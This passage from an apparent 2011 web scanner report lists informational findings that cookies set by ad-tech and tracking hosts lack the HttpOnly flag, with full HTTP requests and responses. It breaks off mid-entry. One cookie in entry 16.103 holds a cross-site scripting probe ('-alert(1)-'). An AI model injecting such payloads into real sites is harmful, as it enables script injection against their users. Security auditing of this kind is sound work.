Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFad=0:0:0:0; FFcat=826,471,14:767,4,14:1185,589,14:305,825,15

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Mon, 03 Sep 2012 02:38:59 GMT;domain=.zedo.com;path=/;
ETag: "436874d-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=326850
Expires: Wed, 07 Sep 2011 21:26:29 GMT
Date: Sun, 04 Sep 2011 02:38:59 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

16.102. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457900B1185,234056,234851:933,196008|1,1#0,24:0,1#0,24:0,1#0,24;expires=Tue, 04 Oct 2011 02:31:37 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1185,589,14:767,33,40:767,4,94:826,471,9:767,4,9:767,4,41:826,471,14:767,4,14:1185,833,14:933,56,15:1302,202,9:305,825,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:1:1:1:1:1:1:0:1:0:0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=181
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:31:37 GMT
Content-Length: 3656
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='';var zzC
...[SNIP]...

16.103. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=1585&s=1&l=1&t=e&e=1 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?bCIAAMFGJAAqmW0AAAAAAD8wHAAAAAAAAgAAAPgAAAAAAP8AAAAHFqpSJQAAAAAArFIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAntA8AAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC2GFqq8irCgocRgCPmDSPtBCJwbVKyI.-i0CdAAAAAA==,,http%3A%2F%2Fd3.zedo.com%2Fjsc%2Fd3%2Fff2.html%3Fn%3D933%3Bc%3D56%3Bs%3D1%3Bd%3D15%3Bw%3D1%3Bh%3D1%3Bq%3D767,B%3D12%26Z%3D1x1%26_salt%3D1921477770%26m%3D2%26r%3D0%26s%3D2377409,b0792572-d69e-11e0-98f4-78e7d1f5c9bc
Cookie: FFgeo=5386156; ZFFBbh=977B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|332_950#369Z695_955#374Z633_962#381; FFAbh=950B809,20|10_1#365Z3_1#392:305,20|145_2#371Z458_1#371; FFBbh=962B809,20|10_1#0Z3_1#15:305,20|145_2#3Z458_1#0; ZEDOIDX=5; FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'; FFcat=933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0; FFad=0:0:0:47:1:1:0:1; aps=1; FFMCap=2457960B933,196008|0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=946B826,20|633_962#381Z695_955#374Z332_950#369;expires=Sat, 03 Dec 2011 02:36:28 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=977B826,20|633_962#7Z695_955#5Z332_950#4;expires=Mon, 03 Sep 2012 02:36:28 GMT;domain=.zedo.com;path=/;
ETag: "3a9d58c-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6938
Expires: Sun, 04 Sep 2011 04:32:06 GMT
Date: Sun, 04 Sep 2011 02:36:28 GMT
Connection: close

GIF89a.............!.......,...........D..;



16.104. http://d7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: None;expires=Tue, 04 Oct 2011 05:00:00 GMT;domain=None;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=4765
Date: Sun, 04 Sep 2011 04:14:41 GMT
Connection: close



16.105. http://d7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1197692Za1015462Zc1185000589%2C1185000589Zs76Zt1246Zm1286Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199;expires=Tue, 04 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=4100
Date: Sun, 04 Sep 2011 02:31:51 GMT
Connection: close



16.106. http://developers.facebook.com/plugins/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /plugins/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.48.116
Connection: close
Date: Sun, 04 Sep 2011 04:14:55 GMT
Content-Length: 0


16.107. http://dis.sv.us.criteo.com/dis/dis.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.sv.us.criteo.com
Path:   /dis/dis.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dis/dis.aspx?pu=1174&cb=eefb80330c HTTP/1.1
Host: dis.sv.us.criteo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cas.criteo.com/delivery/afr.php?zoneid=2873&ct0=http://yads.zedo.com/ads2/c?a=680391%3Bn=826%3Bx=2309%3Bc=826000471,826000471%3Bg=172%3Bi=0%3B1=99%3B2=1%3Bs=318%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=mLs5ThcyantsGCRD8ld6EMRU~080311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bp=8%3Bf=842351%3Bh=842216%3Bo=20%3By=305%3Bv=1%3Bt=r%3Bl=1%3Bs%3D318%3Bu%3DmLs5ThcyantsGCRD8ld6EMRU%7E080311%3Bz%3D0.4584487103923105%3B3%3Dz4-633%3Bk%3D
Cookie: uid=6731d4ad-7dae-4402-b507-a0bc233d79fb; udc=*1LgqBSlkhFCwXQKH6%2bJeAE3uNMVhXL0Ng%2bdKsouT8MQasnIZS58bp7m9v9Qve5MeE; uic=*1pOlwoshvAW2x3Oz%2bjok0cvVUTldU9thEXDVJHERJCsS8Qa8h95CnNUGIZvfT3E7MxvviQAdwbClCyEye0669isBI09H1R%2bKRO%2fltWpPRjN8%3d; evt=*1y97%2bNEPoN61o4EOCN%2fR2J9xVlHZMgVk%2b%2b2CwFGGZfIU%3d; dis=*1qWp1fsD%2bNdFnAtZ8%2baXsozp2l%2bVc4bwCpvGo36v6yzYl0vr%2b2rjd5s8HTnWLQ9vMdXMCedmlDMU1pVu7re3OqNSH03%2b%2fM819k1%2fHITjOJ99Qw4xwyEiIgha04DWLoK6z%2ftKYTIM%2bWvQpq6GH7Cf6THfb8s6N7d8wMlE1BAjK%2bDHApUIrLHRIWZaa1LvF56sc8LiTQybietPPncAzstNhBe%2baDkL8RY%2bTFbyxwc4wWOtAD8BXpV3Cz%2fiiH%2bVSWcx0rMIjfsHkOqahM925DOtINv%2b5GBrED6nMhkSLKihoDycCzgwK0V924PtbaS64eEp7pATGcjXGxFLRtaKsTJllUarZKLj%2blLzkQoSSdQl2IgEDKA2%2fEGzXqNG5Iw%2fnmBmo6CrXMAegC0CK3gdYN%2b9DnZN2Cfy1%2b4%2blkWJ4jnK5p6TQ36wYJrd9vjipwogdRUCTqKEM3BvjqUQfJ0nea7i6vfabzsxKam14f%2fi5q8J2VF2V6DewZNzR%2f5365qR2sDhJWkbOphSWIYmULMBJPmZneFkaco3LrTUxUAqI3%2brS7h8bDHumnJE%2fp2b6uo%2b9XJRy%2fhw%2bC7HcUnCJHPYM0Scri9FFUNs5fbiASA4wjgT53CRkUy0COj5OZSzb96RLeBPIAU8O5IHm0fDHfL3qnOXeEY19u0QsnKNz0kXGI9w9M0Q%3d; udi=*1HptB%2fqzMXoFPX0j%2bzbV2Wg%3d%3d

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Sun, 04 Sep 2011 03:57:31 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: udc=*1D84iREYveIcXTcUuV3G%2bWDI3oCPaaCq4ndvKiJdEQzL3HrGkWUPZvuc4D6KQzQ1X7mjEMA8%2behgOrXEaUTAmJwZohOH7%2fNLtIEuwhFZ8rik5cOZ3UPIOIbjX6FJbxsypIvb%2bgchEY6hOJqxRDF3XEok6NhldfB9UFRA96oIbx68rDrtWSOw1MKueiqCLHUhqKLNXdoPmtaV5oepHfyOdKMgNfzF9eefiCY%2bWuEsAFmEP1ydZXUr4J1srIBp6e%2f0RDCuwh3sbQd94jlqA88sNESQP5l5PlwTlOfstA%2bp9SojknO3iekUzOUXFevnhUNNsxvDUlTvPaxWrfB%2bkaOkFtfwEiZuwSsg7IX7cekpWvIMF53InyMlM9x2Ki0rxukTCXQShXT3Kzxt60rKBKEM0TyZkv81sH4%2f%2bV%2fjLSEzLvjVO1troWdAkr8ssIIXZsJftbP9SR3eNgPk504U9HMyRSqDvgrkRpwHjMQNMura8aZGy1qewlUbiFahQJsAhepTihNXfQSdOG4X6L8F2cXxODJHDxABznU1t0tKMq2cV%2fMPJaZr8oiEFmnFIF5hZrW2nLJkI6EqOo6S9FgGjI09tDvw4%2bzjK15FIekjB8%2fMIOBlsj5YvQ%2bwPdu97DlJLAPagpqj0EOuJxgtq%2fYa6UiCNUsQatfDK%2fPuxb9cmfbe7U8K01SbrfB1YqmFmXbeNkH6%2bYrdGcbSU%2fDVersSXUDtbZQv3DwSRq1o1JdbSBwoNAfze73GYR9joMNQBO%2fq9JzpPjVwTrz2KYtsP8eKJkadbkkijrA2JSFHSa2c72YbJloiIwyzryY7KGfWUPq6amKsR7%2fqV%2fKi9qfByYHmqU6HMu0C%2bxYz0qTVwK5xKtHgp%2frRLQZ5kVcpG0I9GuOBhMzdwj9nwbt%2bTiPqVXFLCS%2bHErQXQE4%2biEsP84XdmQaM%2bOo210FzRwEQBUS2dlJPSE0nHHJ1RZTR%2fUyl5Q7fVfVYBEkBEIiZH%2f7WnCyhatTIyfsYt4cjh5BR8cAfEtzDzYVzuftvBzwWlOI1ulZ9EmIS%2b4A%3d%3d; domain=.criteo.com; expires=Sun, 04-Mar-2012 04:57:31 GMT; path=/
Set-Cookie: dis=*1HdUHehLKopaii0g3LYHPnEdKM%2fxGkB7DQd01XOoeL1sZkEkz3zjh83XQpRJS3%2biCXCkH72HFonZPUaaWLVka5JVI8gNrqvAiJlhOuC13oU83XiV%2fQkBM%2fxfJWxbBwlURgN1HOIDrOkuhuis13QWJrziPNSrREWHlUq%2buCoAr1JZol2clNwQIOTigVqiU0oKkssZnH3oUKz3jIuTk4VAysJicp07wx9GHCc6feOzTy6E7d%2b19geUV%2fNt0WY2agQ%2bMW%2b0BftWgiAXIjgfQj7UUxr2MHsLbU1x4USCW2HPoecK4M9Ye%2b%2ffPAHsOZCX9F4lgUelxWAVmQZUb58fFz20q8Ecm4qKZR4rQ%2fWNTiM3YDyemoxgbtL%2b7aH2kiDBK5qsXBH2isVSHhg%2b%2fmeS7R%2fWcCg4TA7HNCH%2bsOIUnxGvRrdhEq3ZOCsVINKQs9IZ8IPuXh5Siy%2fYRhrFjM6R1ITVFoCIZKLetDEPaLIpnuh2bbhoENj6erMGWFULA5RkCxyYRPiAqFTUA4vwIMS%2fmal%2bRv%2bjiKDwEe%2fyJ7JHcJ%2fMuhO%2bXDneOjdJCrEAgdi0TV%2bZFEdpmtU61aSZqsovJjzsrxSuTnawtngARYbiPakMn60QynqbBZ0iVa16v1XheEDXHgWX%2bjIhYUrOZ1ofTsNpj1OmhIEg%2fTLummfVKc1d3V4yA4SloIuLBMvRxLHYsmoBtGIS67TLObKNb8jcDr7HiqPAf6ocNwCuIofPqFj3RCPtyDbIDR37gYywH0VnVlXW68gmssHsPDh1sAHpGSxFxZRtiFTm7hIGEnfkObg4ev78%3d; domain=.criteo.com; expires=Sun, 04-Mar-2012 04:57:31 GMT; path=/
Set-Cookie: udi=*1KFVyONyyk%2b29tPxKymJDiw%3d%3d; domain=.criteo.com; expires=Mon, 05-Sep-2011 03:57:31 GMT; path=/
Content-Length: 4874

<html>
<head>
<title>Dising</title>
<script type="text/javascript">
function edcTimeout(){}
function write_edc(){}
function initEdc(){}
function cto_AI(u,n,r){var cto_ifr=document.getElementByI
...[SNIP]...

16.108. http://domdex.com/nai_optout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://domdex.com
Path:   /nai_optout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai_optout.php?nocache=0.0210557 HTTP/1.1
Host: domdex.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:15:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: optout=deleted; expires=Sat, 04-Sep-2010 11:15:37 GMT; path=/; domain=.domdex.com
Set-Cookie: optout=deleted; expires=Sat, 04-Sep-2010 11:15:37 GMT; path=/; domain=domdex.com
Set-Cookie: optout=1; expires=Wed, 01-Jan-2020 05:00:00 GMT; path=/; domain=.domdex.com
Location: nai_optout_check.php
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


16.109. http://dp.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dp.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=533 HTTP/1.1
Host: dp.33across.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
Cookie: 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1315103782954%3As2.33%3D%2C6940%2C

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 02:36:31 GMT
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1315103782954%3As2.33%3D%2C6940%2C; Domain=.33across.com; Expires=Mon, 03-Sep-2012 02:36:31 GMT; Path=/
Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=8746800456&seg_code=33x,6940&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26adv%3D307445%26code%3D6940&random=613497
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


16.110. http://i.w55c.net/ping_match.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=RUBICON&rurl=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4210%26nid%3D1523%26put%3D_wfivefivec_%26expires%3D10 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=4642/5271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; matchadmeld=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 02:40:24 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Tue, 03-Sep-13 02:40:24 GMT
Cache-Control: private
Content-Length: 0
Location: http://pixel.rubiconproject.com/tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10
X-Version: DataXu Pixel Tracker v3
Via: 1.1 dfw175165010000 (MII-APC/2.1)
Content-Type: text/plain


16.111. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=84598cb0-ae83-4275-b675-282e3e69bdcf HTTP/1.1
Host: idcs.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: T=1; uid=u=b302c5d5-65f2-40f8-a929-cb62b8ddcae9; sgm=7435=734382&7980=734355&7596=734356&8629=734368&6376=734377; tpd=e20=1315359826890&e90=1313372627004&e50=1315359827084&e100=1313372627366

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377; domain=.interclick.com; expires=Sat, 04-Sep-2021 03:59:22 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 04 Sep 2011 03:59:22 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

16.112. http://idiva.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idiva.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: idiva.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:14:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: fromSite=deleted; expires=Sat, 04-Sep-2010 04:14:32 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 136285

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

16.113. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=0 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; PUBRETARGET=78_1409703834.82_1409705283

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:44:50 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.1928_1315860702.78_1408030145.390_1321207886.2072_1316038897.1039_1316395932; domain=pubmatic.com; expires=Thu, 14-Aug-2014 15:29:05 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

16.114. http://img.pulsemgr.com/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.pulsemgr.com
Path:   /optout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /optout?optout&nocache=0.3267692 HTTP/1.1
